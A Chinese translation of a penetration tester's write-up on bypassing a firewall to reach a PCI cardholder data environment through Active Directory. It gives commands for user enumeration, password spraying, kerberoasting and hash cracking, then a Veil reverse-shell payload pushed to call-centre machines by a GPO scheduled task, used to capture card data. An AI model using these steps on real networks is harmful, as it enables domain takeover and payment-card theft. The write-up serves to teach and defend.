22.png

在這篇文章中我將詳細(xì)介紹如何繞過防火墻，進(jìn)入CDE（持卡人數(shù)據(jù)環(huán)境，代表存儲(chǔ)、處理和傳輸支付卡敏感數(shù)據(jù)的計(jì)算機(jī)環(huán)境），最終提取信用卡數(shù)據(jù)。

一般來說，如果你要存儲(chǔ)、傳輸或處理支付卡數(shù)據(jù)，那么就必須要確保支付卡數(shù)據(jù)在你的內(nèi)部網(wǎng)絡(luò)中保持高度安全，內(nèi)部網(wǎng)絡(luò)環(huán)境必須符合PCI數(shù)據(jù)安全標(biāo)準(zhǔn)（PCI-DSS）。當(dāng)然，如果你的內(nèi)部網(wǎng)絡(luò)進(jìn)行了分段，則不必讓整個(gè)內(nèi)部網(wǎng)絡(luò)都符合PCI規(guī)范，只需讓分段出的處理支付卡數(shù)據(jù)的環(huán)境符合PCI數(shù)據(jù)安全標(biāo)準(zhǔn)。而分段，即隔離出CDE，通常是利用防火墻來實(shí)現(xiàn)的。

以上就是有關(guān)此次滲透測(cè)試的一些背景，現(xiàn)在讓我們正式開始吧。

注意，文中所有敏感信息都已修改，與真實(shí)數(shù)據(jù)相差甚遠(yuǎn)。目標(biāo)公司擁有一個(gè)非常龐大的內(nèi)部網(wǎng)絡(luò)，所有IP都在10.0.0.0/8范圍內(nèi)。而持卡人數(shù)據(jù)位于單獨(dú)的192.168.0.0/16范圍內(nèi)，與公司其他部門隔離。對(duì)CDE的操作主要由呼叫中心的操作員在接聽客戶電話后，在外部的Web應(yīng)用中將資金細(xì)節(jié)輸入表格再提交。

讓我們從普通的內(nèi)部環(huán)境開始，在10.0.0.0/8的范圍內(nèi)連接到公司的內(nèi)部辦公網(wǎng)絡(luò)，然后我們使用ping和端口掃描從當(dāng)時(shí)網(wǎng)絡(luò)位置掃描整個(gè)CDE，結(jié)果如下：

33.png

44.png

ping掃描與直接使用ping命令效果基本一樣，只不過nmap可以一次掃描整個(gè)網(wǎng)段。而第二個(gè)命令結(jié)果中的hosts up其實(shí)和nmap的參數(shù)-Pn有關(guān)，nmap在此情況下不會(huì)ping操作，此時(shí)nmap會(huì)將掃描范圍內(nèi)的所有主機(jī)都報(bào)告為up，真實(shí)情況可能完全相反。

因此，除非你有能繞過防火墻的手段，或者可以猜到管理防火墻的密碼，否則直接掃描似乎不太可能。現(xiàn)在，我們要做的就是通過取得域管理員權(quán)限來控制活動(dòng)目錄。

成為域管理員

有很多方法可以做到這一點(diǎn)，比如我之前發(fā)表的這篇文章。

在這種情況下，我可以利用kerberoast（就是破解Kerberos服務(wù)票據(jù)并改寫）來控制域。我需要在域中找一個(gè)未授權(quán)的攻擊點(diǎn)，逐步深入。

攻擊活動(dòng)目錄的第一步是控制盡可能多的用戶帳戶，只要它們能以某種方式和域控制器進(jìn)行身份驗(yàn)證即可。在Windows世界中，所有帳戶都應(yīng)該能通過域控制器進(jìn)行身份驗(yàn)證，即使它們沒有權(quán)限執(zhí)行任何操作也是如此。在Windows默認(rèn)安全級(jí)別下，即使是權(quán)限最低的帳戶在登錄時(shí)也需要驗(yàn)證密碼是否正確。

在客戶的內(nèi)網(wǎng)環(huán)境中，域控制器允許建立空會(huì)話（在未提供用戶名與密碼的情況下建立會(huì)話）。在這種情況下，我們又發(fā)現(xiàn)域控制器IP為10.0.12.100，“PETER”。這使得我們可以用enum4linux等工具枚舉用戶，得到域中每個(gè)用戶的用戶名：

$ enum4linux -R 1000-50000 10.0.12.100 |tee enum4linux.txt

55.png

66.png

現(xiàn)在我們有了一個(gè)用戶列表，我們可以將它轉(zhuǎn)變成一個(gè)可閱讀的格式：

$ cat enum4linux.txt | grep '(Local User)' |awk '$2 ~ /MACFARLANE\\/ {print $2}'| grep -vP '^.*?\$$' | sed 's/MACFARLANE\\//g'

77.png

在實(shí)際情況下，這個(gè)內(nèi)部網(wǎng)絡(luò)異常龐大，活躍用戶超過25000人。

現(xiàn)在我們將用戶名整理成文本文件，然后使用CrackMapExec等工具來猜測(cè)密碼。在這里，我們將統(tǒng)一測(cè)試是否有用戶使用Password1作為他們的密碼。不要小看這個(gè)密碼，它可符合活動(dòng)目錄默認(rèn)的密碼復(fù)雜性要求，因?yàn)樗姆N字符類型中的三種（大寫，小寫和數(shù)字）。

$ cme smb 10.0.12.100 -u users.txt -p Password1

Wow，有一個(gè)成功：

88.png

請(qǐng)注意，如果你想測(cè)試完所有帳戶，需要指定參數(shù)--continue-on-success：

99.png

現(xiàn)在我們已經(jīng)控制了一個(gè)帳戶，可以查詢活動(dòng)目錄，獲得服務(wù)帳戶列表。服務(wù)帳戶是一種代表服務(wù)的帳戶，就像Microsoft SQL Server這樣的服務(wù)。這些服務(wù)運(yùn)行時(shí)，需要在以某種帳戶身份存在于系統(tǒng)?；顒?dòng)目錄的Kerberos身份驗(yàn)證系統(tǒng)可給其提供訪問權(quán)限，此時(shí)活動(dòng)目錄需要提供“服務(wù)票據(jù)”以方便用戶對(duì)其進(jìn)行身份驗(yàn)證。Kerberos的身份驗(yàn)證不在本文的討論范圍之內(nèi)，如果你想了解更多信息，可以點(diǎn)擊這里。

通過從域控制器請(qǐng)求Kerberos服務(wù)帳戶列表，我們還能得到每個(gè)帳戶的“服務(wù)票據(jù)”。此服務(wù)票據(jù)是使用服務(wù)帳戶的密碼所加密。因此，如果我們可以破解它，就有很大概率得到高權(quán)限帳戶。Impacket工具集可以幫助我們批量請(qǐng)求：

$ GetUserSPNs.py -outputfile SPNs.txt -request 'MACFARLANE.EXAMPLE.COM/chuck:Password1' -dc-ip 10.0.12.100

100.png

正如我們所看到的，其中一個(gè)服務(wù)帳戶是Domain Admins的成員，這就是我們的目標(biāo)。

$ hashcat -m 13100 --potfile-disable SPNs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

在運(yùn)行hashcat進(jìn)行密碼破解后，我們得到了明文密碼：

110.png

為了二次確認(rèn)，我再次使用了CrackMapExec。

$ cme smb 10.0.12.100 -u redrum -p 'murder1!'

120.png

Wahoo，Pwn3d！現(xiàn)在我們已經(jīng)是域控制器的管理員了。

得到支付卡數(shù)據(jù)

現(xiàn)在，我們的目標(biāo)是CDE中接受呼叫中心指令的計(jì)算機(jī)，它們都位于同一個(gè)活動(dòng)目錄中，雖然我們無法直接連接到那些敏感的機(jī)器，但我們現(xiàn)在可以告訴域控制器讓它們來連接我們。為此，需要深入了解組策略對(duì)象（GPO）。GPO允許將各種范圍級(jí)別的設(shè)置應(yīng)用于用戶和計(jì)算機(jī)。為了防止保護(hù)客戶隱私，你只需要知道它可以以不同范圍級(jí)別控制域中的計(jì)算機(jī)。

客戶GPO的許多功能都是用于統(tǒng)一管理組織中的IT設(shè)置。例如，統(tǒng)一設(shè)置密碼策略或者統(tǒng)一設(shè)置為用戶桌面顯示哪些圖標(biāo)（例如，打開公司網(wǎng)站的快捷方式）。而有一個(gè)GPO可以運(yùn)行微軟中的“計(jì)劃任務(wù)”。這正是我們所需要的...我創(chuàng)建一個(gè)需要目標(biāo)機(jī)器運(yùn)行的腳本，讓它們連接回我們的機(jī)器。以下是具體步驟：

1.生成payload。這里我們使用了Veil Evasion。我們的IP地址是10.0.12.1，因此我們?cè)O(shè)置回連到這個(gè)地址。

$ veil -t EVASION -p 22 --ip 10.0.12.1 --port 8755 -o pci_shell 

130.png

2.使用我們從kerberoasting獲得的憑據(jù)，通過遠(yuǎn)程桌面協(xié)議（RDP）登錄到域控制器。

140.png

3.在活動(dòng)目錄中找到CDE。根據(jù)我們對(duì)客戶組織的了解，我們知道呼叫中心在2樓工作。通過瀏覽目錄，我們定位到一個(gè)特殊的名字：

150.png

4.將我們用Veil制作的惡意腳本放入文件夾，然后在域控制器上進(jìn)行共享。在共享和目錄上設(shè)置權(quán)限，允許所有域用戶讀取。

160.png

5.在GPO中，我們?cè)谌缦聢D創(chuàng)建策略：

170.png

6.在編輯這個(gè)新的GPO時(shí)，查找“計(jì)劃任務(wù)”選項(xiàng)，并創(chuàng)建新的“即時(shí)計(jì)劃任務(wù)”：

180.png

7.創(chuàng)建指向共享中惡意腳本的任務(wù)。同時(shí)在common下設(shè)置Run in logged-on user's security context。

190.png

Done！

在我等了15分鐘后，什么也沒發(fā)生。我知道組策略的生效可能需要90分鐘或者更久，但我覺得至少有一臺(tái)機(jī)器現(xiàn)在已經(jīng)應(yīng)用了新策略（注意，如果在實(shí)驗(yàn)室中測(cè)試，你可以使用gpupdate/force）。然后我又等了五分鐘，看到了如下情況：

aa.png

運(yùn)行命令截取屏幕截圖，確切地返回了呼叫中心當(dāng)時(shí)輸入的內(nèi)容...支付卡數(shù)據(jù)！

200.png

滲透目標(biāo)已全部完成！

如果我們查看會(huì)話列表，我們可以看這個(gè)會(huì)話的IP來自192.168.0.0/16 ：

bb.png

在實(shí)際測(cè)試中，整個(gè)二樓的機(jī)器基本都返回了shell，我最后得到了60-100個(gè)Meterpreter。

在實(shí)際的測(cè)試中，有一個(gè)專門截圖的腳本（我們使用metasploit的autorunscript來實(shí)現(xiàn)），這樣我們就可以深入其他方面。

還有其他獲取截圖的命令，例如在Meterpreter中使用use espia以及metasploit的post/windows/gather/screen_spy。

還有一些以編程的方式執(zhí)行GPO的方法，例如PowerView中的New-GPOImmediateTask。

而從防御的角度來說，可以實(shí)施很多安全措施，例如把CDE設(shè)置一個(gè)單獨(dú)的活動(dòng)目錄，鼓勵(lì)用戶設(shè)置強(qiáng)密碼并確保任何服務(wù)帳戶都是瘋狂的長(zhǎng)密碼（20多個(gè)字符，完全隨機(jī)）。還可以檢測(cè)是否有任何用戶一次性去請(qǐng)求所有服務(wù)的票據(jù)，也可以使用蜜罐進(jìn)行防御。

本文由白帽匯整理并翻譯，不代表白帽匯任何觀點(diǎn)和立場(chǎng)：https://nosec.org/home/detail/2523.html
來源：https://markitzeroday.com/pci/active-directory/kerberoast/firewall/2019/04/24/gaining-access-to-card-data-using-the-windows-domain-to-bypass-firewalls.html